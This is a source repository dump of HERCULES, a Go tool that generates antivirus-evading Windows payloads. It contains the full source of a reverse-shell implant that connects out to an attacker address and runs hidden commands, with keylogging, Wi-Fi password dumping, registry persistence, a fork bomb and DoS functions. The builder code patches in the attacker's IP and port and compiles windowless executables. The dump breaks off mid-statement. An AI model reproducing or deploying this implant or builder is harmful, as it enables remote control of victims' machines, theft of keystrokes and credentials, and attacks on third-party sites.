├── HERCULES ├── LICENSE ├── README.md ├── SOURCE ├── HERCULES.go └── Payloads │ ├── HERCULES REVERSE SHELL.go │ ├── Meterpreter_Reverse_HTTP_HTTPS.go │ └── Meterpreter_Reverse_TCP.go └── Setup.go /HERCULES: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd $HERCULES_PATH 4 | cd SOURCE 5 | ./HERCULES 6 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Ege Balcı 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HERCULES [![License](https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000)](https://raw.githubusercontent.com/EgeBalci/HERCULES/master/LICENSE) [![Support](https://img.shields.io/badge/Support-Mail-red.svg)](https://github.com/EgeBalci/HERCULES/wiki) [![Golang](https://img.shields.io/badge/Go-1.6-blue.svg)](https://golang.org) 2 | 3 | HERCULES is a customizable payload generator that can bypass antivirus software. 4 | 5 | 6 | VERSION 3.0.5 7 | 8 | 9 | ![](http://i.imgur.com/SMU8WU4.png) 10 | 11 | 12 | #INSTALLATION 13 | 14 | SUPPORTED PLATFORMS: 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 |
Operative system Version
Ubuntu 16.04 / 15.10
Kali linux Rolling / Sana
Manjaro*
Arch Linux*
Black Arch*
Parrot OS3.1
46 | 47 | go get github.com/fatih/color 48 | go run Setup.go 49 | 50 | WARNING: Don't change the location of the HERCULES folder. 51 | 52 | #USAGE 53 | 54 | HERCULES 55 | 56 | 57 | #SPECIAL FUNCTIONS 58 | 59 | 60 | Persistence : Persistence function adds the running binary to windows start-up registry (CurrentVersion/Run) for continuous access. 61 | 62 | Migration : This function triggers a loop that tries to migrate to a remote process until it is successfully migrated. 63 | 64 | #WHAT IS UPX ? 65 | 66 | UPX (Ultimate Packer for Executables) is a free and open source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it, packed binary unpack(decompress) itself at runtime to memory. 67 | 68 | #WHAT IS "AV EVASION SCORE" ? 69 | 70 | AV Evasion Score is a scale(1/10) for determining the effectiveness of the payloads anti virus bypassing capabilities, 1 represents low possibility to pass AV softwares. 71 | 72 | Using special functions and packing the payloads with upx decreases the AV Evasion Score. 73 | 74 | ![](http://i.imgur.com/8L1wmjo.png) 75 | 76 | ![](http://i.imgur.com/N2bhpR9.jpg) 77 | 78 | Bitcoin: 16GvMV7eZH22p4rLQuu8h2gbgSLYr11KBM 79 | 80 | 81 | #COMING SOON... 82 | 83 | - Binary infector 84 | - Bypass AV functon 85 | - AES payload encryption 86 | - OSX support 87 | 88 | 89 | -------------------------------------------------------------------------------- /SOURCE/HERCULES.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 4 | import "strings" 5 | import "fmt" 6 | import "os" 7 | import "time" 8 | import "strconv" 9 | import "net/http" 10 | import "io/ioutil" 11 | import "os/exec" 12 | import "encoding/base64" 13 | import "github.com/fatih/color" 14 | 15 | 16 | const VERSION string = "3.0.5" 17 | 18 | var HERCULES_REVERSE_SHELL string = "package main

import "net"
import "os/exec"
import "bufio"
import "strings"
import "syscall"
import "time"
import "EGESPLOIT"



const IP string = "10.10.10.84"
const PORT string = "5555"

const BACKDOOR bool = false;
const EMBEDDED bool = false;
const TIME_DELAY time.Duration = 5;//Second

const B64_BINARY string = "//INSERT-BINARY-HERE//"
const BINARY_NAME string = "winupdt.exe"

var GLOBAL_COMMAND string;
var PARAMETERS string;
var KeyLogs string;



func main() {


  if EMBEDDED == true {
    EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS)
  }


  if BACKDOOR == true {
    EGESPLOIT.Persistence()
  }

  connect, err := net.Dial("tcp", IP+":"+PORT);
  if err != nil {
    time.Sleep(TIME_DELAY*time.Second);
    main();
  };



  Dir, Version, Username, AV := EGESPLOIT.Sysguide()
  SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV)  + "\n\n\n" + string(Dir) + ">")
  connect.Write([]byte(string(SysGuide)));



  for {

    Command, _ := bufio.NewReader(connect).ReadString('\n');
    _Command := string(Command);
    GLOBAL_COMMAND = _Command;



    if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") {
      connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND)));
    }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") {
      Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444"
      Address := string(Temp_Address[1])
      ConType := strings.Split(_Command, " ")
      ConType[1] = strings.TrimPrefix(ConType[1], "--")
      EGESPLOIT.Meterpreter(ConType[1], Address)
      connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">"));
    }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") {
      Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212
      Address := string(Temp_Address[1])
      Pid := strings.Split(_Command, " ")
      Result, Error := EGESPLOIT.Migrate(Pid[2], Address)
      if Result == true {
          connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") {
      DOS_Command := strings.Split(GLOBAL_COMMAND, "\"")
      var DOS_Target string =  DOS_Command[1]
      if strings.Contains(string(DOS_Target), "http") {
        go EGESPLOIT.Dos(DOS_Target);
        connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") {
      EGESPLOIT.Distrackt();
    }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){
      go EGESPLOIT.Keylogger(&KeyLogs);
       connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">")));
    }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){
      Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">");
      connect.Write([]byte(Dump_Output));
    }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") {
      List := EGESPLOIT.WifiList();
      connect.Write([]byte(string(List)));
    }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") {
      connect.Write([]byte(string(HELP+Dir+">")));
    }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") {
      go EGESPLOIT.Persistence();
      connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">"));
    }else{
      cmd := exec.Command("cmd", "/C", _Command);
      cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true};
      out, _ := cmd.Output();
      Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">");
      connect.Write([]byte(Command_Output));
    };
  };
};






var BANNER string = `
                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ############################
`




var HELP string = `

                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ##########################################



~PERSSISTENCE                         Installs a persistence module for continious acces

~DISTRACT                             Executes a fork bomb bat file for distraction

~PLEASE                               Asks users comfirmation for higher privilidge operations

~DOS -A "www.targetsite.com"          Starts a denial of service atack

~WIFI-LIST 						                Dumps all wifi history data with passwords

~METERPRETER --http "10.0.0.1:4444"   Creates a meterpreter connection to metasploit (http/https/tcp)

~KEYLOGGER-DEPLOY                     Installs a keylogger module and logs all keystrokes

~KEYLOGGER-DUMP                       Dumps all loged keystrokes

~MIGRATE "10.0.0.1:4444" 2222         Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)


###############################################################################################

`
" 19 | var METERPRETER_TCP string = "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" 20 | var METERPRETER_HTTP_HTTPS string = "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" 21 | 22 | type PAYLOAD struct { 23 | Ip string 24 | Port string 25 | Type int 26 | Size string 27 | UPX_Size string 28 | MidSize string 29 | FullSize string 30 | Score float32 31 | FileName string 32 | SourceCode string 33 | Persistence bool 34 | Migrate bool 35 | BypassAV bool 36 | UPX bool 37 | 38 | } 39 | 40 | var Payload PAYLOAD 41 | var MenuSelection int 42 | var Ask string 43 | var NO int 44 | 45 | 46 | 47 | func main() { 48 | 49 | Green := color.New(color.FgGreen) 50 | BoldGreen := Green.Add(color.Bold) 51 | Yellow := color.New(color.FgYellow) 52 | BoldYellow := Yellow.Add(color.Bold) 53 | Red := color.New(color.FgRed) 54 | BoldRed := Red.Add(color.Bold) 55 | 56 | 57 | Result := CheckSetup() 58 | 59 | if Result == false { 60 | ClearScreen() 61 | PrintBanner() 62 | PrintCredit() 63 | 64 | BoldRed.Println("\n\n[!] HERCULES is not installed properly, please run setup.sh") 65 | 66 | os.Exit(1) 67 | 68 | } 69 | 70 | ClearScreen() 71 | PrintBanner() 72 | PrintCredit() 73 | Menu_1() 74 | 75 | fmt.Scan(&MenuSelection) 76 | 77 | ClearScreen() 78 | 79 | if MenuSelection == 1 { 80 | PrintBanner() 81 | PrintPayloads() 82 | fmt.Print("\n\n[*] Select : ") 83 | fmt.Scan(&NO) 84 | PreparePayload(NO) 85 | 86 | fmt.Print("\n\n[*] Enter the base name for output files : ") 87 | fmt.Scan(&Payload.FileName) 88 | CompilePayload() 89 | AskUPX() 90 | FinalView() 91 | }else if MenuSelection == 2 { 92 | ClearScreen() 93 | PrintBanner() 94 | PrintCredit() 95 | BoldRed.Println("\n\n[!] 
Bind payload option will be added at next version...") 96 | time.Sleep(3*time.Second) 97 | main() 98 | }else if MenuSelection == 3 { 99 | ClearScreen() 100 | PrintBanner() 101 | PrintCredit() 102 | fmt.Println("\n\n") 103 | Result := ChecVersion() 104 | if strings.Contains(Result, "[!]") { 105 | BoldRed.Println(Result) 106 | if Result == "[!] New version detected" { 107 | BoldYellow.Print("\nDo you want to upgrade ? (y/n) : ") 108 | fmt.Scan(&Ask) 109 | if Ask == "y" || Ask == "Y" { 110 | Update := exec.Command("sh", "-c", "chmod 777 Update && sudo ./Update") 111 | Update.Stdout = os.Stdout 112 | Update.Stderr = os.Stderr 113 | Update.Start() 114 | }else{ 115 | main() 116 | } 117 | } 118 | }else{ 119 | BoldGreen.Println(Result) 120 | time.Sleep(3*time.Second) 121 | main() 122 | } 123 | }else{ 124 | main() 125 | } 126 | 127 | 128 | } 129 | 130 | func CheckSetup() (bool){ 131 | 132 | DirList, _ := exec.Command("sh", "-c", "cd $HERCULES_PATH/src && ls").Output() 133 | GoVer, _ := exec.Command("sh", "-c", "go version").Output() 134 | UPX, _ := exec.Command("sh", "-c", "upx").Output() 135 | 136 | if (!(strings.Contains(string(DirList), "EGESPLOIT"))) { 137 | return false 138 | } 139 | 140 | if !(strings.Contains(string(GoVer), "version")) { 141 | return false 142 | } 143 | if !(strings.Contains(string(UPX), "Markus")) { 144 | return false 145 | } 146 | return true 147 | } 148 | 149 | 150 | func ChecVersion() (string){ 151 | 152 | Response, Error := http.Get("https://raw.githubusercontent.com/EgeBalci/HERCULES/master/SOURCE/HERCULES.go") 153 | if Error != nil { 154 | return "[!] ERROR : Connection attempt failed" 155 | } 156 | Body, _ := ioutil.ReadAll(Response.Body) 157 | 158 | Version := string(`"`+VERSION+`"`) 159 | 160 | if !(strings.Contains(string(Body), Version)) { 161 | return "[!] 
New version detected" 162 | }else{ 163 | return "[+] HERCULES is up to date" 164 | } 165 | 166 | } 167 | 168 | 169 | func PrintBanner() { 170 | color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") 171 | color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") 172 | color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") 173 | color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") 174 | color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") 175 | color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") 176 | color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") 177 | color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") 178 | color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") 179 | color.Red(" ░ ") 180 | 181 | } 182 | 183 | func PrintCredit() { 184 | Green := color.New(color.FgGreen) 185 | BoldGreen := Green.Add(color.Bold) 186 | color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") 187 | color.Green("+ -- --=[ Version: "+VERSION+" ]") 188 | BoldGreen.Println("+ -- --=[ Ege Balcı ]") 189 | } 190 | 191 | 192 | func Menu_1() { 193 | Yellow := color.New(color.FgYellow) 194 | BoldYellow := Yellow.Add(color.Bold) 195 | White := color.New(color.FgWhite) 196 | UnderlinedWhite := White.Add(color.Underline) 197 | BoldYellow.Println("\n[1] GENERATE PAYLOAD ") 198 | BoldYellow.Println("\n[2] BIND PAYLOAD ") 199 | BoldYellow.Println("\n[3] UPDATE ") 200 | 201 | UnderlinedWhite.Print("\n\n[*] Select : ") 202 | } 203 | 204 | func PrintPayloads() { 205 | 206 | White := color.New(color.FgWhite) 207 | BoldWhite := White.Add(color.Bold) 208 | Green := color.New(color.FgGreen) 209 | BoldGreen := Green.Add(color.Bold) 210 | 211 | 212 | fmt.Println("\n") 213 | BoldWhite.Println(" #===============================================================================#") 214 | BoldWhite.Println(" | PAYLOAD | SIZE/UPX | AV Evasion Score |") 215 | BoldWhite.Println(" 
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~|") 216 | BoldWhite.Print("(1) Meterpreter Reverse TCP | 946 KB / 262 KB | ") 217 | BoldGreen.Print(" 8/10 ") 218 | BoldWhite.Println("|") 219 | BoldWhite.Println(" | | | |") 220 | BoldWhite.Print("(2) Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 221 | BoldGreen.Print(" 8/10 ") 222 | BoldWhite.Println("|") 223 | BoldWhite.Println(" | | | |") 224 | BoldWhite.Print("(3) Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 225 | BoldGreen.Print(" 8/10 ") 226 | BoldWhite.Println("|") 227 | BoldWhite.Println(" | | | |") 228 | BoldWhite.Print("(4) HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 229 | BoldGreen.Print("7/10 ") 230 | BoldWhite.Println("|") 231 | BoldWhite.Println(" | | | |") 232 | BoldWhite.Println(" #===============================================================================#") 233 | fmt.Println("\n") 234 | } 235 | 236 | 237 | func FinalView() { 238 | Cyan := color.New(color.FgCyan) 239 | BoldCyan := Cyan.Add(color.Bold) 240 | Green := color.New(color.FgGreen) 241 | BoldGreen := Green.Add(color.Bold) 242 | Blue := color.New(color.FgBlue) 243 | BoldBlue := Blue.Add(color.Bold) 244 | Yellow := color.New(color.FgYellow) 245 | BoldYellow := Yellow.Add(color.Bold) 246 | Red := color.New(color.FgRed) 247 | BoldRed := Red.Add(color.Bold) 248 | White := color.New(color.FgWhite) 249 | BoldWhite := White.Add(color.Bold) 250 | ClearScreen() 251 | PrintBanner() 252 | 253 | if Payload.Type == 1 { 254 | BoldBlue.Println("#====================================================================================#") 255 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 256 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 257 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") 258 | if Payload.Score < 5 { 259 | BoldRed.Print(Payload.Score) 260 | }else if Payload.Score == 5 { 261 | 
BoldYellow.Print(Payload.Score) 262 | }else { 263 | BoldGreen.Print(Payload.Score) 264 | } 265 | if Payload.Score == 10 { 266 | BoldGreen.Print("/10 ") 267 | }else{ 268 | BoldGreen.Print("/10 ") 269 | } 270 | BoldBlue.Println("#") 271 | BoldBlue.Println("#====================================================================================#") 272 | }else if Payload.Type == 2 { 273 | BoldBlue.Println("#====================================================================================#") 274 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 275 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 276 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 277 | if Payload.Score < 5 { 278 | BoldRed.Print(Payload.Score) 279 | }else if Payload.Score == 5 { 280 | BoldYellow.Print(Payload.Score) 281 | }else { 282 | BoldGreen.Print(Payload.Score) 283 | } 284 | if Payload.Score == 10 { 285 | BoldGreen.Print("/10 ") 286 | }else{ 287 | BoldGreen.Print("/10 ") 288 | } 289 | BoldBlue.Println("#") 290 | BoldBlue.Println("#====================================================================================#") 291 | }else if Payload.Type == 3 { 292 | BoldBlue.Println("#====================================================================================#") 293 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 294 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 295 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 296 | if Payload.Score < 5 { 297 | BoldRed.Print(Payload.Score) 298 | }else if Payload.Score == 5 { 299 | BoldYellow.Print(Payload.Score) 300 | }else { 301 | BoldGreen.Print(Payload.Score) 302 | } 303 | if Payload.Score == 10 { 304 | BoldGreen.Print("/10 ") 305 | }else{ 306 | BoldGreen.Print("/10 ") 307 | } 308 | BoldBlue.Println("#") 309 | 
BoldBlue.Println("#====================================================================================#") 310 | }else if Payload.Type == 4 { 311 | BoldBlue.Println("#====================================================================================#") 312 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 313 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 314 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 315 | if Payload.Score < 5 { 316 | BoldRed.Print(Payload.Score) 317 | }else if Payload.Score == 5 { 318 | BoldYellow.Print(Payload.Score) 319 | }else { 320 | BoldGreen.Print(Payload.Score) 321 | } 322 | if Payload.Score == 10 { 323 | BoldGreen.Print("/10 ") 324 | }else{ 325 | BoldGreen.Print("/10 ") 326 | } 327 | BoldBlue.Println("#") 328 | BoldBlue.Println("#====================================================================================#") 329 | } 330 | 331 | 332 | if Payload.Persistence == true { 333 | BoldCyan.Print("\n[*] Persistence : ON") 334 | BoldWhite.Print(" (") 335 | BoldRed.Print("-2") 336 | BoldWhite.Println(")") 337 | } 338 | if Payload.Migrate == true { 339 | BoldCyan.Print("\n[*] Migration : ON") 340 | BoldWhite.Print(" (") 341 | BoldRed.Print("-1") 342 | BoldWhite.Println(")") 343 | } 344 | 345 | if Payload.UPX == true { 346 | BoldCyan.Print("\n[*] UPX : ON") 347 | BoldWhite.Print(" (") 348 | BoldRed.Print("-3") 349 | BoldWhite.Println(")") 350 | } 351 | 352 | 353 | if Payload.Type == 1 { 354 | if Payload.UPX == true && (Payload.Persistence || Payload.Migrate ){ 355 | BoldCyan.Println("\n[*] Payload Size : 326 KB") 356 | }else if Payload.UPX == true && !(Payload.Persistence || Payload.Migrate) { 357 | BoldCyan.Println("\n[*] Payload Size : 262 KB") 358 | }else if Payload.UPX == false && !(Payload.Persistence || Payload.Migrate ) { 359 | BoldCyan.Println("\n[*] Payload Size : 946 KB") 360 | } 361 | 362 | }else{ 363 | if Payload.UPX == true 
{ 364 | BoldCyan.Println("\n[*] Payload Size : " + Payload.UPX_Size) 365 | }else{ 366 | BoldCyan.Println("\n[*] Payload Size : " + Payload.Size) 367 | } 368 | } 369 | 370 | 371 | PayloadName := strings.TrimSuffix(Payload.FileName, ".go") 372 | 373 | PayloadName += ".exe" 374 | 375 | BoldCyan.Println("\n[*] Payload saved at : /$HOME/" + PayloadName + "\n\n") 376 | 377 | 378 | } 379 | 380 | 381 | func CompilePayload() { 382 | Yellow := color.New(color.FgYellow) 383 | BoldYellow := Yellow.Add(color.Bold) 384 | Red := color.New(color.FgRed) 385 | Warning := Red.Add(color.Bold) 386 | 387 | Payload.FileName += ".go" 388 | 389 | File, _ := os.Create(Payload.FileName) 390 | Source, _ := base64.StdEncoding.DecodeString(Payload.SourceCode) 391 | var SourceCode string 392 | 393 | if Payload.Type == 2 || Payload.Type == 3 { 394 | Address := string("\"http://" + Payload.Ip + ":" + Payload.Port + "/\"") 395 | SourceCode = strings.Replace(string(Source), string("\"http://127.0.0.1:8080/\""), string(Address), -1) 396 | if Payload.BypassAV == true { 397 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 398 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) 399 | } 400 | if Payload.Persistence == true { 401 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", `import "EGESPLOIT/RSE"`, -1) 402 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Persistence()", "RSE.Persistence()", -1) 403 | } 404 | if Payload.Migrate == true { 405 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 406 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Migrate(Addr, len(Shellcode))", "RSE.Migrate(Addr, len(Shellcode))", -1) 407 | } 408 | 409 | 410 | File.WriteString(SourceCode) 411 | 412 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go 
build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 413 | BoldYellow.Println("\n[*] Compiling payload...") 414 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 415 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 416 | BuildCommand.Stdout = os.Stdout 417 | BuildCommand.Stderr = os.Stderr 418 | BuildCommand.Run() 419 | CleanFilesCommand := string("rm " + Payload.FileName) 420 | exec.Command("sh", "-c", CleanFilesCommand).Run() 421 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 422 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 423 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 424 | Warning.Println("\n[!] ERROR : Compile failed") 425 | os.Exit(1) 426 | } 427 | File.Close() 428 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") 429 | exec.Command("sh", "-c", MovePayload).Run() 430 | 431 | 432 | 433 | 434 | }else if Payload.Type == 1 { 435 | var IP string = "[4]byte{" 436 | IP_Array := strings.Split(string(Payload.Ip), `.`) 437 | for i := 0; i < 4; i++ { 438 | if i == 3 { 439 | IP += (IP_Array[i] + ",") 440 | break 441 | } 442 | IP += (IP_Array[i] + "," + " ") 443 | } 444 | IP += "}}" 445 | 446 | SourceCode = strings.Replace(string(Source), `[4]byte{127,0,0,1}}`, IP, -1) 447 | SourceCode = strings.Replace(string(SourceCode), `5555`, Payload.Port, -1) 448 | if Payload.BypassAV == true { 449 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 450 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) 451 | } 452 | 453 | if Payload.Persistence == true { 454 | SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) 455 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Persistence()`, `RSE.Persistence()`, -1) 456 | } 457 | if Payload.Migrate == true { 458 | SourceCode = strings.Replace(string(SourceCode), `//import 
"EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) 459 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Migrate(Addr, int(Length_int))`, `RSE.Migrate(Addr, int(Length_int))`, -1) 460 | } 461 | 462 | 463 | File.WriteString(SourceCode) 464 | 465 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 466 | BoldYellow.Println("\n[*] Compiling payload...") 467 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 468 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 469 | BuildCommand.Stdout = os.Stdout 470 | BuildCommand.Stderr = os.Stderr 471 | BuildCommand.Run() 472 | CleanFilesCommand := string("rm " + Payload.FileName) 473 | exec.Command("sh", "-c", CleanFilesCommand).Run() 474 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 475 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 476 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 477 | Warning.Println("\n[!] 
ERROR : Compile failed") 478 | os.Exit(1) 479 | } 480 | File.Close() 481 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") 482 | exec.Command("sh", "-c", MovePayload).Run() 483 | 484 | }else if Payload.Type == 4 { 485 | Payload.Ip = string(`"`+Payload.Ip+`"`) 486 | Payload.Port = string(`"`+Payload.Port+`"`) 487 | SourceCode = strings.Replace(string(Source), `"10.10.10.84"`, Payload.Ip, -1) 488 | SourceCode = strings.Replace(string(SourceCode), `"5555"`, Payload.Port, -1) 489 | 490 | File.WriteString(SourceCode) 491 | 492 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 493 | BoldYellow.Println("\n[*] Compiling payload...") 494 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 495 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 496 | BuildCommand.Stdout = os.Stdout 497 | BuildCommand.Stderr = os.Stderr 498 | BuildCommand.Run() 499 | CleanFilesCommand := string("rm " + Payload.FileName) 500 | exec.Command("sh", "-c", CleanFilesCommand).Run() 501 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 502 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 503 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 504 | Warning.Println("\n[!] ERROR : Compile failed") 505 | os.Exit(1) 506 | } 507 | File.Close() 508 | MovePayload := 